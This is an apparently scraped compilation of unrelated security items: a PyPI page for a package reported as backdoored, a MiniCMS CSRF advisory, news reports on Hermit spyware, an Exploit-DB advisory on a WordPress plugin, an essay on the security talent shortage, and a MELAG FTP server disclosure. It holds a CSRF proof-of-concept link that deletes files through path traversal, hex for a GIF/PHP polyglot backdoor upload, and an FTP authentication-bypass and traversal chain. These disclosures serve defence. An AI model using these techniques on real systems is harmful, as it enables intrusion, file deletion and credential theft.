The Rondolu-YT-Concate package in PyPI v0.1.0 was discovered to contain a code execution backdoor. This vulnerability allows attackers to access sensitive user information and digital currency keys, as well as escalate privileges.

pip install rondolu-yt-concate

Latest version

Released: Jun 18, 2021

Produce a concatenated video of clips that mentioned a word from youtube channel

**Navigation**

*   Project description
*   Release history
*   Download files

**Project links**

*   Homepage

**Statistics**

GitHub statistics:

*   **Stars:**
*   **Forks:**
*   **Open issues/PRs:**

View statistics for this project via Libraries.io, or by using our public dataset on Google BigQuery

**Meta**

**License:** MIT License (MIT)

**Author:** Jacky Lu

**Requires:** Python >=3.6.0

**Maintainers**

 rondolu0113

**Classifiers**

*   **License**
    *   OSI Approved :: MIT License
*   **Programming Language**
    *   Python
    *   Python :: 3
    *   Python :: 3.6
    *   Python :: Implementation :: CPython
    *   Python :: Implementation :: PyPy

*   Project description
*   Project details
*   Release history
*   Download files

**Project description**

"# yt-concate"

**Project details**

**Project links**

*   Homepage

**Statistics**

GitHub statistics:

*   **Stars:**
*   **Forks:**
*   **Open issues/PRs:**

View statistics for this project via Libraries.io, or by using our public dataset on Google BigQuery

**Meta**

**License:** MIT License (MIT)

**Author:** Jacky Lu

**Requires:** Python >=3.6.0

**Maintainers**

 rondolu0113

**Classifiers**

*   **License**
    *   OSI Approved :: MIT License
*   **Programming Language**
    *   Python
    *   Python :: 3
    *   Python :: 3.6
    *   Python :: Implementation :: CPython
    *   Python :: Implementation :: PyPy

  

**Release history Release notifications | RSS feed**

This version

0.1.0

Jun 18, 2021

**Download files**

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

**Built Distribution**

rondolu\_yt\_concate-0.1.0-py3-none-any.whl (6.1 kB view hashes)

Uploaded Jun 18, 2021 py3

Close

**Hashes for rondolu\_yt\_concate-0.1.0-py3-none-any.whl**

Hashes for rondolu\_yt\_concate-0.1.0-py3-none-any.whl

Algorithm

Hash digest

SHA256

4411eee83d49ab3580877fb7f96b1a581e7024b5f1fa73b40c751360c11715b6

MD5

53c557fe9447584ce3ce653e84fb6d4b

BLAKE2-256

853d8080fa1360d0ca4fdbf25f111b7f683d0507da5e2b6428270320169f8cdc

Close

CVE-2022-34065: rondolu-yt-concate

A Cross-Site Request Forgery (CSRF) in MiniCMS v1.11 allows attackers to arbitrarily delete local .dat files via clicking on a malicious link.

Software Link : https://github.com/bg5sbk/MiniCMS After the installation is complete, log in as administrator, open the page

In post.php, user can delete any local .dat files without filter

Create 1.dat in the parent directory

To delete 1.dat, the url is like http://127.0.0.1:80/MiniCMS-master/mc-admin/post.php?delete=../1&state=delete&date=&tag=

Also you can delete any .dat file like local google chrome file

http://127.0.0.1:80/MiniCMS-master/mc-admin/page.php?delete=../../../../../../../../opt/google/chrome/icudtl&state=delete&date=&tag=

Here is CSRF POC test.html: Log in and click the link in test.html, modify the parameter of delete and users will delete the .dat file in the specified directory at last.

    <a href="http://127.0.0.1:80/MiniCMS-master/mc-admin/post.php?delete=../1&state=delete&date=&tag=">click</a>

CVE-2022-33121: There is CSRF vulnerabilities that can lead to deleting local .dat files · Issue #45 · bg5sbk/MiniCMS

By Deeba Ahmed
According to Google, Italian spyware provider RCS Labs received support from several Internet Service Providers (ISPs) to distribute…
This is a post from HackRead.com Read the original post: ISPs Helping Attackers Install Hermit Spyware on Smartphones- Google

****According to Google, Italian spyware provider RCS Labs received support from several Internet Service Providers (ISPs) to distribute Hermit spyware on iOS and Android smartphones in Kazakhstan and Italy.****

Google Threat Analysis Group published its findings on the highly sophisticated Hermit spyware. Report authors Benoit Sevens and Clement Lecigne wrote that an Italian spyware provider, RCS Labs, received support from several Internet Service Providers (ISPs) to distribute Hermit spyware on iOS and Android smartphones in Kazakhstan and Italy using commercially available surveillance tools. 

**Drive-By-Downloads to Infect Target Devices**

Researchers state that this campaign, which mainly relies on drive-by-downloads, proves threat actors may not always rely on exploits to get extensive permissions on a device. Through drive-by-downloads, they can fulfill their malicious goals just as effectively with the help of ISPs.

**Attack Scenario**

The attackers get their victim’s internet connection disrupted with the support of ISPs. In some cases, the target’s ISP disabled their mobile data connection. The victims are then requested to install a malicious application to get back online through an SMS message containing a URL. The victim is asked to install the application and resume their data connection.

Since the campaign involves ISPs, these apps are disguised as legit mobile carrier apps. In scenarios where attackers couldn’t directly influence the target’s ISP, they embedded the spyware in apps disguised as messaging applications.

The victim is redirected to a fake support page where they are promised to recover their suspended social media (Facebook and Instagram) and WhatsApp accounts. Though the social media links let the user install the official apps, the WhatsApp link leads the victim to a fake version of the WhatsApp app.

A screenshot shared by Google shows one of the malicious sites involved in the attack (fb-techsupportcom

**Malicious iOS Apps used by 6 Different Exploits**

According to a blog post published by Google’s Threat Analysis Group, these malicious apps were unavailable on Google Play and Apple App Store. The threat actors sideloaded the iOS version, which was signed with an enterprise certificate.

The target was asked to enable installation for these apps through unknown sources. The iOS apps used in the attack contain a “generic privilege escalation exploit wrapper” used by 6 different exploits. It also includes a “minimalist agent” that can exfiltrate device data, including the WhatsApp database. Details of these exploits are as follows:

*   **CVE-2021-30883 known as Clicked2**
*   **CVE-2021-30983 known as Clicked3**
*   **CVE-2020-9907 known as AveCesare**
*   **CVE-2020-3837 known as TimeWaste**
*   **CVE-2018-4344 known as LightSpeed**
*   **CVE-2019-8605 known as SockPort2/SockPuppet**

**Android Version Details**

The drive-by attacks on Android phones require the victims to enable a setting for installing third-party apps from unknown sources, after which fake apps disguised as legit brand apps like Samsung request extensive permissions. Besides rooting the device for rooted access, the apps are designed to fetch/execute arbitrary remote components, which communicate with the main application.

**Hermit Capabilities**

Hermit boasts a modular feature set and can steal sensitive data from smartphones, including location, contacts, call logs, and SMS messages. The spyware’s modularity allows it to become fully customizable.

Once installed on the device, it can record audio and even make/redirect phone calls, apart from abusing accessibility services permissions. However, researchers didn’t specify the RCS Labs clients involved in this campaign or its targets. For your information, RCS Labs is among the 30 spyware providers currently tracked by Google.

*   Edward Snowden urges users to stop using ExpressVPN
*   How a Woman’ Fitbit Fitness Tracker Helped Solve Her Murder Case
*   Pics of IDF women soldiers helped hackers to breach Israeli Military Servers
*   Cloud video platform abused in web skimmer attack against real estate sites
*   Cybercrime Syndicate Leader Behind Phishing, BEC Scams Arrested in Nigeria

ISPs Helping Attackers Install Hermit Spyware on Smartphones- Google

In WordPress Plugin User Photo 0.9.4, when a photo is uploaded, it is only partially validated and it is possible to upload a backdoor on the server hosting WordPress. This backdoor can be called (executed) even if the photo has not been yet approved.

    # Exploit Title: WordPress User Photo Component Remote File Upload Vulnerability
    # Google Dork: inurl:"/wp-content/uploads/userphoto/"
    # Date: 17/FEB/2011
    # Author: ADVtools
    # Software Link: http://wordpress.org/extend/plugins/user-photo/
    # Version: 0.9.4
    # Tested on: *nix , Windows
    
    I. Product Description
    
    User Photo is a WordPress component that allows a user to associate a photo with her account and for this photo to be displayed in  posts and comments.
    
    
    II. Vulnerability description
    
    When a photo is uploaded, it is only partially validated and it is possible to upload a backdoor on the server hosting WordPress. This backdoor can be called (executed) even if the photo has not been yet approved.
    
    
    III. Analysis
    
    1. Image type validation
    
    When a file is uploaded, its type is validated. Only the following types are accepted:
    
           $userphoto_validtypes = array(
                   "image/jpeg" => true,
                   "image/pjpeg" => true,
                   "image/gif" => true,
                   "image/png" => true,
                   "image/x-png" => true
           );
    
    The type is validated by the following code:
    
           if(@!$userphoto_validtypes[$_FILES['userphoto_image_file']['type']])
                   $error = sprintf(__("The uploaded file type &ldquo;%s&rdquo; is not allowed.", 'user-photo'), $_FILES['userphoto_image_file']['type']);
    
    This code verifies the MIME type of the uploaded file. A navigator infers the MIME type from the file itself or from its extension but it is possible to intercept the HTTP request and change it (using a proxy such as WebScarab). This way, any file can be uploaded as if it were an image. The HTTP header to change is Content-type:
    
    Content-type: image/gif
    
    2. Image resizing
    
    When a photo (an image) is uploaded, its size is checked. If it is too big, it is resized. To avoid this resizing, the uploaded file has to look like a small image. The verification of the size of the image is done with code such as:
    
           $imageinfo = getimagesize($tmppath);
    
    In the case of GIF, this PHP function simply looks at the beginning of the GIF header and extracts the size of the image. A GIF header starts with:
    
    Offset   Length   Contents
     0      3 bytes  "GIF"
     3      3 bytes  "87a" or "89a"
     6      2 bytes  <Logical screen width in little-endian byte order>
     8      2 bytes  <Logical screen height in little-endian byte order>
    
    getimagesize ignores the remaining of the binary data. It is thus easy to create a file that looks like a small GIF image but that is in fact something else.
    
    3. PHP file
    
    A PHP file can contain binary data. This data are reflected on the output steam without interpretation. Only data between <?php and ?> are interpreted as PHP code (see http://www.php.net/manual/en/language.basic-syntax.phpmode.php). Using this characteristic and the previous point, it is thus possible to construct a file that looks like a small GIF image but that is in fact a PHP file. For example (in hexadecimal):
    
           47 49 46 38 39 61 14 00 14 00 3C 3F 70 68 70 20 70 68 70 69 6E 66 6F 28 29 3B 20 3F 3E
    
    This file is recognized as a GIF image with a width and a height of 20 pixels and also as a PHP file containing a call to phpinfo(). Using the same technic, it is possible to upload a backdoor.
    
    4. Uploading
    
    Once uploaded, the PHP file is always located at the same place:
    
           wp-content/uploads/userphoto/alice.php
    
    where alice is the login name (nickname) of the user uploading the file.
    
    Important: This file is present even if it has not yet been approved by the moderator.
    
    5. Limitation
    
    Since the PHP file begins with a fake GIF header, this header will be output for every response. In practice, this is not really a problem: it can be simply ignored (in the case of a backdoor outputting HTML) or manually removed (in the case of the downloading of file). In some cases (for example when images are dynamically returned), a backdoor has to be slightly modified to avoid outputting two GIF headers.
    
    6. Special case
    
    In some installations, PHP files are interpreted as Unicode (16 bits). Since the beginning of the GIF header is 16-bit aligned, it is not an issue. The PHP code has to be written in Unicode.
    
    7. Other concerns
    
    This component contains also a XSS vulnerability located in the same lines of code.
    
    
    IV. Versions affected
    
    Version 0.9.4 (latest version as of January 2011).
    
    Other versions were not tested.
    
    
    V. Impact
    
    The exact impact depends of the configuration of the web server and of the operating system:
    
    - In the worst case, if Apache is running as root or as an Administrator, the server is compromised (owned).
    
    - If the Apache server is running as a dedicated low privilege user, the backdoor will have limited access. Most of the time, the backdoor will have read access but no write access except in very specific places. To compromise the server, another vulnerability is necessary (escalation).
    
    
    VI. Proof of concept / Exploit
    
    See part III and attachment.
    
    
    VII. Mitigation, Workaround and fix
    
    The hardening of the web server will limit the impact.
    
    
    VIII. Disclosure time-line
    
    2010.07      First researches, vulnerability discovered
    2011.01.24   Proof of concept
    2011.01.27   Vendor notified
    2011.02.17   Public disclosure
    
    
    IX. References
    
    Graphics Interchange Format
    http://en.wikipedia.org/wiki/Graphics_Interchange_Format
    
    GIF specification
    http://www.w3.org/Graphics/GIF/spec-gif89a.txt
    
    PHP Escaping from HTML
    http://www.php.net/manual/en/language.basic-syntax.phpmode.php
    
    Passing Malicious PHP Through getimagesize()
    http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/
    
    PHP Exploit Code in a GIF
    http://isc2.sans.org/diary.html?storyid=2997

CVE-2013-1916: Offensive Security’s Exploit Database Archive

We have a tech innovation problem, not a staff retention (or recruitment) problem.

Over 47 million Americans voluntarily quit their jobs in 2021. This unprecedented mass workforce exit was dubbed the "Great Resignation." Spurred by the COVID-19 pandemic and the long-term trend of workers rethinking their relationships with the labor market, those who quit cited low pay, a lack of advancement opportunities, and feeling disrespected as their top reasons for leaving, according to Pew Research. 

The cybersecurity industry was not immune to this wave of disruption. Despite the fact that the US added more than 250,000 people to the cybersecurity workforce between 2020 and 2021, the need for cybersecurity professionals increased by 30% in that same time. The demand for workers in cybersecurity is growing, driven by unprecedented levels of cyberattacks on governments, Fortune 500 companies, local businesses, and everywhere in between. But the supply of cybersecurity expertise is coming up short.

The cybersecurity talent shortage clearly has real impact, but it may not be as tied to retention strategies or the Great Resignation as many people think. We have a shortage of staff because we are not using security staff efficiently. Better technology that leads to better utilization of the people we have can ease the problem.

**New Solutions, Stronger Workforce**

Weak cybersecurity leaves organizations vulnerable to breaches, data loss, and regulatory penalties. Organizations tap vendors for a robust array of cybersecurity technologies to alleviate these evolving issues. Vendors consume massive budgets to cultivate, hire, and retain an army of workers with the right innovative mindset and technical capabilities to create solutions that address sophisticated, next-generation cyber threats.

But cybersecurity vendors can't create those solutions because they're having trouble retaining enough people in the workforce, right? Well, not exactly.

The superficial reason for the workforce shortage is the booming labor market. In industries where low pay, few promotion opportunities, burnout, general work/life inflexibility, and poor job benefits are the reason workers are fleeing, there is an absolute need for comprehensive solutions to address those new-normal problems. For cybersecurity, however, the reality of the talent shortage is that technology isn't meeting the moment.

The talent pool may, in fact, be dwindling. But the technology platforms and solutions we have need to be better at making life easier — both for current talent and to enhance the capabilities of customers vulnerable to a host of attacks. Automation is key to meeting those goals.

What if cybersecurity vendors solved the issue and helped talented people out there right now by unlocking the ability to embrace true innovation? What if vendors make it easier for everyday users to operate products for effective cybersecurity? The tools themselves need to be simplified and reliable. If there were no need for an overly specialized and multitudinous amount of effort in the workforce, then there would be no technical debt.

Let's be clear: We're not suggesting taking away the expertise of cybersecurity professionals. This is about innovating enough to alleviate the complexities of the solutions and give every customer control during a threat situation. Adopting security automation is the core of cybersecurity democratization.

So what would that look like?

**Automation and Democratization**

It's on industry leaders to facilitate new tools for the everyday user. Think about it from the perspective of the type of tech that regular workers take for granted each day.

Google's G-Suite gives users easy, intuitive access to products like Docs and email; Wix helps users drag, drop, and easily create an entire personalized website; Canva turns anyone into a designer, not just people with hours of Photoshop experience; and so on. These were previously cumbersome processes and difficult-to-use sets of products before innovation tipped the balance toward everyday, intuitive use. This is what needs to be done for cybersecurity.

To be proficient, companies need to develop technology that's going to help empower the everyday user with tools and knowledge that give them understandable visibility into cyberattacks. Here are the elements such automated and democratized technology would need to cover.

*   **Detection:** By automating proactive threat detection and prevention capabilities, people can stay a step ahead of cybercriminals without the need for specialized security skills.
*   **Response:** Ideally when you identify a cyber alert, you need to know what to do with it. Normally the reaction is panic. Incident responses via automated tools need to tell users step by step what to do to mitigate the spread of the attack and improve their cyber resilience over time.
*   **Integration:** Security architectures may be unique, but new solutions must be open source enough to connect any tool in an existing security stack with additional out-of-the-box integrations as threats evolve.

The talent shortage will continue if we don't look at the problem in a different and radical way. Making advanced tools more accessible for all businesses and verticals will foster innovation and solve the talent shortage that is leaving business and consumer data vulnerable. Solutions should become as easily accessible as sending and receiving an email or swiping through your iPhone. The tools and ability to innovate are already here — they just need to be distributed.

The Cybersecurity Talent Shortage Is a Myth

MELAG FTP Server 2.2.0.4 stores unencrpyted passwords of FTP users in a local configuration file.

**UPDATE**

**\[07.06.2022\]** We've been informed by MELAG that a new version has been released, to address the vulnerabilities detailed below. We've checked the update and can confirm the following updates for the identified vulnerabilities:

*   User Enumeration \[fixed\]
*   Authentication Bypass \[fixed\]
*   Path Traversal \[fixed¹\]
*   Storage of Cleartext Passwords \[still vulnerable²\]
*   Weak File Permissions \[partially fixed³\]
*   High System Privileges \[unchanged\]

¹Path Traversal: We found a bypass using junctions. However, the current implementation does not allow a normal user to create junctions. ²Storage of Cleartext Passwords: We found that the FTP server config and passwords are encrypted, but a static key was used for that. We were able to write a generic decryptor to bypass the encryption implementation. ³Weak File Permissions: FULL control granted to _Everyone_ has been changed to READ/WRITE control to _Authenticated Users_, which is slightly more secure, but still allows attacks from unprivileged, local users.

**Intro**

During an engagement in early 2021 my colleague nv1t and myself stumbled across an FTP server with a banner that we've never seen before, which said MELAG FTP SERVER along with a version number.

As this banner was unknown to us and the existence of an FTP server at the specific network location itself seemed a little odd (since we did not expect to see an FTP server on the external network of this client), we decided to take a look into what this piece of software is and what we could find about it. Querying Google for the presented Banner, we found the source of this FTP Server and the company that had developed this with the first hit. Searching for known vulnerabilities, however, did not reveal any results. Luckily for us though the vendor did offer this exact FTP Server in the same version as we found it in our client's network for download.

We downloaded the FTP Server, set up a testing environment, began to dissect it and found 6x high impact vulnerabilities.

**Summary and Mitigation Advice**

In the following sections we will describe an attack chain that allows an attacker to escalate from an unauthenticated network position to gain authenticated host access, which could further be exploited to compromise and control the targeted host system running the vulnerable FTP server. This attack can as well be conducted from the internet against publicly accessible MELAG FTP server instances. After a long and fruitless disclosure process (see the following timeline) we decided to disclose our findings publicly, to allow affected organizations and companies to be aware of the vulnerabilities and protect themselves against attacks.

To mitigate exploitation of these attack we advise to disconnect MELAG FTP servers from untrusted (public) networks, **especially from the public internet.** While writing this blog post, the vendor has so far not provided any software update to mitigate the identified vulnerabilities, therefore the only mitigation against exploitation is preventing network level access to this FTP server.

The vulnerabiliy research detailed in the following sections has been conducted by my colleague nv1t and myself, as part of our role at SSE, during the aftermath of a client engagement.

**Timeline**

*   27.05.2021: Initial Mail to MELAG informing about the found vulnerabilities
*   07.06.2021: Response from MELAG, details and report were handed over to MELAG
*   08.06.2021: Confirmation of Report received from MELAG
*   12.07.2021: 1st Update request from SSE to MELAG, asking if there are any questions on the report or update plans - no response
*   12.08.2021: 2nd Update request from SSE to MELAG, auto response indicating absence of contact - no further response
*   20.09.2021: 3rd Update request from SSE to MELAG - no response
*   20.09.2021: CVE Request to MITRE for 6x identified vulnerabilities, confirmation of submission by MITRE
*   06.12.2021: 1st Update request from SSE to MITRE, asking if there is any update on the process - no response
*   18.02.2022: 2nd Update request from SSE to MITRE - no response
*   04.04.2022: Vulnerability information submitted to CERT-Bund (BSI) - Confirmation of submission by CERT-Bund
*   25.04.2022: 1st Update request from SSE to CERT-Bund (BSI) - Response on 26.04.2022
*   25.04.2022: Informed MELAG and CERT-Bund (BSI) that this blog post will be published during the next two weeks. - Response on 26.04.2022
*   26.04.2022: CERT-Bund (BSI) confirmed the vulnerabilities and will contact MELAG - No statement from MELAG as of 05.05.2022.
*   05.05.2022: Public Disclosure, up to this point the software has not been updated and MELAG has not responded.
*   30.05.2022: MELAG informed us that an updated version (2.2.0.5) has been released to fix the addressed issues.
*   07.06.2022: We informed MELAG about the insufficient fix to encrypt user passwords and other data using static encryption keys.

**Vulnerabilities**

In the following sections the identified vulnerabilities will be described. Please note that these vulnerabilities will be described **in order of a potential exploitation chain**, not in order of their rated risk.

In total we identified the following 6 vulnerabilities:

*   User Enumeration
*   Authentication Bypass
*   Path Traversal
*   Storage of Cleartext Passwords
*   Weak File Permissions
*   High System Privileges

The FTP Server was found to be written in .NET, which allowed us to decompile and analyze the source code. dnSpy was used for this purpose. Snippets of this source code will be shown in the following sections to highlight the vulnerable code functions.

**User Enumeration**

As an entry point into the application, we found a user enumeration vulnerability that allows an attacker to identify whether a given username is a registered FTP user or not. As with all user enumeration vulnerabilities, the vulnerability presents itself by returning different server response for valid and invalid usernames. The FTP protocol defines the command USER to submit the username used for logon, which is vulnerable to user enumeration, as shown below:

User Enumeration Vulnerability

This vulnerability could easily be exploited using a brute-force style approach using an automated network scanner, such as hydra or by building a custom enumeration script.

As an example: Using a naive python-based network scanner the 10.000 name samples from SecLists could be tested in about 3mins on a local network.

User Enumeration Exploitation

This user enumeration vulnerability within the USER command function can also be found in the application .NET code, as shown below:

Source code: USER Command

**Authentication Bypass**

Given a valid username we digged deeper into what happens within the implementation of the USER command in case a valid username was submitted, which is shown below:

The important bit here is that the RefUserAccount attribute of the cc (ClientConnection) variable is set to the account that matches the given username if the identified account is active. To get a better picture of what this means the server UI, which comes with the installation of the FTP server, is shown below:

This interface shows the identified user "ftpuser" along with a checked "active" box, showing that this FTP user is currently active and allowed to log in.

The interesting takeaway from the code snippet above is that the RefUserAccount attribute has been set for the connection, although no password has been specified yet. So far only the USER command has been sent to submit the username. This gets interesting when inspecting other command implementations, for example the implementation of the LIST command that is shown below (snippet):

Source code: LIST Command

This source code snippet shows the implementation of the FTP LIST command, which can be used to list the contents of the current directory. As highlighted above this command used the RefUserAccount attribute of the connection to resolve a user's base directory. The only requirement to make the highlighted call successful is that the RefUserAccount attribute is set, which has been previously set by submitting a valid username. What's missing is any form of authentication verification, as no password has been provided for this user so far. Looking at this code we were curious if any FTP functions could be called by only submitting a username, but no password. Testing this theory resulted in the following output:

FTP List Command Without a Password

The server response shows a "Login failed", however the dir command seems to imply that the command was successful, although no output was received (We'll go into the details of this behaviour at the end of this section...). This result let us into trying this manually and opening up a data connection ourselves (using the FTP passive mode).

Using the FTP PORT command we were able to specify our own endpoint for the passive FTP mode and successfully retrieved the directory listing of the user ftpuser without specifying any password for this user. Looking through the rest of the code, we were interested if this flaw is only present in the implementation of the LIST command. We found that this flaw was present in all implemented FTP commands, which also allowed us to read the file "myfile.txt" that has been identified earlier using the FTP RETR command:

Now that we proved that this vulnerability can be exploited, let's investigate why the dir command did not returned any output when used from within the ftp command line tool. The reason for this is that the ftp command line tool - like many other ftp clients - will always send a password with the PASS command to the ftp server, even when this password is empty. In other words: Every ftp client expects the server to process a USER command followed by a PASS command. Looking at the source code of the MELAG FTP server for the PASS command, we can find the following snippet:

Source code: PASS command

If the refUserAccount variable is set - which it is in our case, as we send a valid username with the USER command, but the password does not match with the password of the associated user, then cc.RefUserAccount will be set to null. Looking at the source code for the LIST command, which is was is triggered when the command dir is sent through the used ftp client, we'll see that a response with the status code of _150 FileStatusOK_ is send back to the client (which we also saw earlier) and then the cc.List is called to handle the directory listing with the first argument of cc.RefUserAccount.BaseDirectory.

Source code: LIST command (revisited)

Since the cc.RefUserAccount is null, BaseDirectory is called on null, which causes an error and the termination of the command. We'll add another annotation to this at the end of the blog post.

**Path Travesal**

So far we were able to "authenticate" to the FTP server by only using a valid and active username and reading a user's base directory indluding all files therein. Our tour through the code and the various implemented FTP commands also revealed that the application is vulnerable to path traversal attacks, which we found within the implementation of the CWD command.

This source code snippet shows the ChangeDir command that is called when submitting the CWD <PATH> command. The supplied sub-path of the CWD command is passed as the 2nd argument ("subDir") to the ChangeDir function. As highlighted above no sanity checks are performed to ensure the user is actually supplying a "sub directory", which allows an attacker to traverse through the entire host system, as shown below.

Consequently, this allows to read arbitrary files of the host system, as long as the user who is running the FTP server has the permission to read these files (which we'll later see could be all files). A proof of concept is shown below:

Proof of concept: Reading C:\\Windows\\win.ini

**Storage of Cleartext Passwords**

Being able to read through all files (that the user running the FTP server has permission to read) allowed us to look for potentially interesting configuration files that ship with this FTP server...and we found one.

The FTP server stores configurations in an XML file called "config.dat", which is stored under %ProgramData%\ProgramData\MELAG Medizintechnik GmbH & Co. KG\FTP-Server\config.dat. Looking into this file we found - among other configuration settings - ftp user accounts with their respective password stored in plaintext:

Although so far we did not need to know the ftp user's password to run any of the above attacks it's certainly not good having these passwords stored in plaintext on disk.

**Weak File Permissions**

So far we had to specify that combining the authentication bypass and the path traversal attacks allows an attacker to read arbitrary files (and directories) on the target host, only if the user running the FTP Server had sufficient (host-level) permissions to read those files. We found this caveat does not apply to the sensitive config.dat file, which stores ftp user credentials in plain-text, as the default installation of the FTP server allows Everyone **full control** over this file

This would also allow a local attacker on the host system to compromise all FTP users and their files, as an attacker can read (and change) all FTP users credentials and thereby login as any user.

**High System Privileges**

Lastly to weaken the "we can only read/write files that the user running the FTP server has permissions to read/write"-disclaimer even more we found that when installing the FTP server, the administrator is prompted with the following installation choices.

If the user chooses to install the FTP server "as Windows application" the server is installed like any other application and can be started by any user. If the user on the other hand chooses to install the FTP server "as Windows service", a service is created that runs the "NT Authority\\SYSTEM" user, which has the highest system privileges.

FTP Server running as System

A compromised MELAG FTP Server running as "SYSTEM" could then be used to compromise the entire host system.

**Further Annotations**

When describing the "Authentication Bypass" vulnerability, we found that the default Linux ftp command line client does not allow us to exploit the identified vulnerability. During our research we figured that many ftp clients, including Python's default ftplib, behave in the same manner of sending the PASS command right after the USER command, disallowing a user to step in without a password being send. During our analysis we patched the default Python ftplib to serve our needs, but for this blog post we figured it's worth noting that the "manual" approach, going through the protocol step-by-step, can also be fruitful.

Another interesting, but not exploitable (at least as far as we know) twist worth mentioning can be found in the following screenshot that was previously shown in the "Authentication Bypass" section:

As mentioned earlier this code does not check for an authenticated user session, but for our exploit a valid username was required. This requirement is only made necessary, due to the fact that in .NET calling an attribute of a null object causes a run-time exception. If .NET would evaluate a call on null to an empty string, we could have exploited this FTP server even without a valid username...

**Conclusion**

During our research we found several vulnerabilities within the MELAG FTP Server in version 2.2.0.4, which allows an attacker to chain some of these vulnerabilities to escalate privileges from an unauthenticated network position to the highest system privileges on a target host.

We think that these vulnerabilities are pretty severe, especially given that these vulnerabilities can be chained and that this vulnerable FTP server is - due to the market position of the vendor - likely to be found within companies of the medical business sector, such as hospitals, medical practices and so on.

We would have preferred to close all of these vulnerabilities with the vendor, but sadly we didn't receive any response, even after almost a year after we handed in our report describing all of the presented issues. However, we still are and always will be happy to support the mitigation process against the shown attacks.

CVE-2021-41639: Advisory and Exploitation: The MELAG FTP Server

A week after it emerged that sophisticated mobile spyware dubbed Hermit was used by the government of Kazakhstan within its borders, Google said it has notified Android users of infected devices.
Additionally, necessary changes have been implemented in Google Play Protect — Android's built-in malware defense service — to protect all users, Benoit Sevens and Clement Lecigne of Google Threat

A week after it emerged that sophisticated mobile spyware dubbed Hermit was used by the government of Kazakhstan within its borders, Google said it has notified Android users of infected devices.

Additionally, necessary changes have been implemented in Google Play Protect — Android's built-in malware defense service — to protect all users, Benoit Sevens and Clement Lecigne of Google Threat Analysis Group (TAG) said in a Thursday report.

Hermit, the work of an Italian vendor named RCS Lab, was documented by Lookout last week, calling out its modular feature-set and its abilities to harvest sensitive information such as call logs, contacts, photos, precise location, and SMS messages.

Once the threat has thoroughly insinuated itself into a device, it's also equipped to record audio and make and redirect phone calls, in addition to abusing its permissions to accessibility services to keep tabs on the foreground apps used by the victims.

Its modularity also enables it to be wholly customizable, equipping the spyware's functionality to be extended or altered at will. It's not immediately clear who were targeted in the campaign, or which of RCS Lab clients were involved.

The Milan-based company, operating since 1993, claims to provide "law enforcement agencies worldwide with cutting-edge technological solutions and technical support in the field of lawful interception for more than twenty years." More than 10,000 intercepted targets are purported to be handled daily in Europe alone.

"Hermit is yet another example of a digital weapon being used to target civilians and their mobile devices, and the data collected by the malicious parties involved will surely be invaluable," Richard Melick, director of threat reporting for Zimperium, said.

The targets have their phones infected with the spy tool via drive-by downloads as initial infection vectors, which, in turn, entails sending a unique link in an SMS message that, upon clicking, activates the attack chain.

It's suspected that the actors worked in collaboration with the targets' internet service providers (ISPs) to disable their mobile data connectivity, followed by sending an SMS that urged the recipients to install an application to restore mobile data access.

"We believe this is the reason why most of the applications masqueraded as mobile carrier applications," the researchers said. "When ISP involvement is not possible, applications are masqueraded as messaging applications."

To compromise iOS users, the adversary is said to have relied on provisioning profiles that allow fake carrier-branded apps to be sideloaded onto the devices without the need for them to be available on the App Store.

An analysis of the iOS version of the app shows that it leverages as many as six exploits — CVE-2018-4344, CVE-2019-8605, CVE-2020-3837, CVE-2020-9907, CVE-2021-30883, and CVE-2021-30983 — to exfiltrate files of interest, such as the WhatsApp database, from the device.

"As the curve slowly shifts towards memory corruption exploitation getting more expensive, attackers are likely shifting too," Google Project Zero's Ian Beer said in a deep-dive analysis of an iOS artifact that impersonated the My Vodafone carrier app.

On Android, the drive-by attacks require that victims enable a setting to install third-party applications from unknown sources, doing so which results in the rogue app, masquerading as smartphone brands like Samsung, requests for extensive permissions to achieve its malicious goals.

The Android variant, besides attempting to root the device for entrenched access, is also wired differently in that instead of bundling exploits in the APK file, it contains functionality that permits it to fetch and execute arbitrary remote components that can communicate with the main app.

"This campaign is a good reminder that attackers do not always use exploits to achieve the permissions they need," the researchers noted. "Basic infection vectors and drive by downloads still work and can be very efficient with the help from local ISPs."

Stating that seven of the nine zero-day exploits it discovered in 2021 were developed by commercial providers and sold to and used by government-backed actors, the tech behemoth said it's tracking more than 30 vendors with varying levels of sophistication who are known to trade exploits and surveillance capabilities.

What's more, Google TAG raised concerns that vendors like RCS Lab are "stockpiling zero-day vulnerabilities in secret" and cautioned that this poses severe risks considering a number of spyware vendors have been compromised over the past ten years, "raising the specter that their stockpiles can be released publicly without warning."

"Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments with the technical expertise to develop and operationalize exploits," TAG said.

"While use of surveillance technologies may be legal under national or international laws, they are often found to be used by governments for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers and opposition party politicians."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google Says ISPs Helped Attackers Infect Targeted Smartphones with Hermit Spyware

The company is warning victims in Italy and Kazakhstan that they have been targeted by the malware from Italian firm RCS Labs.

The company is warning victims in Italy and Kazakhstan that they have been targeted by the malware from Italian firm RCS Labs.

Google is warning victims in Kazakhstan and Italy that they are being targeted by Hermit, a sophisticated and modular spyware from Italian vendor RCS Labs that not only can steal data but also record and make calls.

Researchers from Google Threat Analysis Group (TAG) revealed details in a blog post Thursday by TAG researchers Benoit Sevens and Clement Lecigne about campaigns that send a unique link to targets to fake apps impersonating legitimate ones to try to get them to download and install the spyware. None of the fake apps were found on either Apple’s or Google’s respective mobile app stores, however, they said.

TAG is attributing the capabilities to notorious surveillance software vendor RCS Labs, which previously was linked to spyware activity employed by an agent of the Kazakhstan government against domestic targets, and identified by Lookout research.

“We are detailing capabilities we attribute to RCS Labs, an Italian vendor that uses a combination of tactics, including atypical drive-by downloads as initial infection vectors, to target mobile users on both iOS and Android,” a Google TAG spokesperson wrote in an email to Threatpost sent Thursday afternoon.

All campaigns that TAG observed originated with a unique link sent to the target that then tries to lure users into downloading Hermit spyware in one of two ways, researchers wrote in the post. Once clicked, victims are redirected to a web page for downloading and installing a surveillance app on either Android or iOS.

“The page, in Italian, asks the user to install one of these applications in order to recover their account,” with WhatsApp download links specifically pointing to attacker-controlled content for Android or iOS users, researchers wrote.

****Collaborating with ISPs****

One lure employed by threat actors is to work with the target’s ISP to disable his or her mobile data connectivity, and then masquerade as a carrier application sent in a link to try to get the target to install a malicious app to recover connectivity, they said.

